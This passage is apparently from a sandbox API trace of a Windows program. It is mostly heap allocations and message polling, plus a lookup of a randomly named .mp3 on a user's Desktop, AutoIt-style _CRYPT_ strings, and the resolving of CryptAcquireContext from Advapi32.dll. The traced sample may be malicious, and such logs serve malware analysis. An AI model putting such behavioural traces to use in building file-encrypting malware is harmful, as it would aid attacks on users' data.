Flags=0x0, Size=0x20) returned 0x2e54198 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0131.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0131.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0131.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0131.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0131.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0131.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0131.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0131.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0131.708] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/3cV5UrNf8.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56751600, ftCreationTime.dwHighDateTime=0x1d5e2f0, ftLastAccessTime.dwLowDateTime=0xb3866f0, ftLastAccessTime.dwHighDateTime=0x1d5e86e, ftLastWriteTime.dwLowDateTime=0xb3866f0, ftLastWriteTime.dwHighDateTime=0x1d5e86e, nFileSizeHigh=0x0, nFileSizeLow=0x1309, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="3cV5UrNf8.mp3", cAlternateFileName="3CV5UR~1.MP3")) returned 0xa87710 [0131.708] FindClose (in: hFindFile=0xa87710 | out: hFindFile=0xa87710) returned 1 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0131.709] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0131.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0131.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0131.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0131.710] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0131.710] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0131.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0131.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0131.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0131.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.711] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0131.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0131.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0131.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0131.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0131.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0131.891] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0131.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0131.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0131.892] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.892] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0131.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0131.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0131.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0131.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0131.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0131.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0131.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0131.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0131.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0131.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.894] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0131.894] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.894] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.894] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0131.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0131.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0131.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69888 [0131.895] WideCharToMultiByte (in: CodePage=0x0, 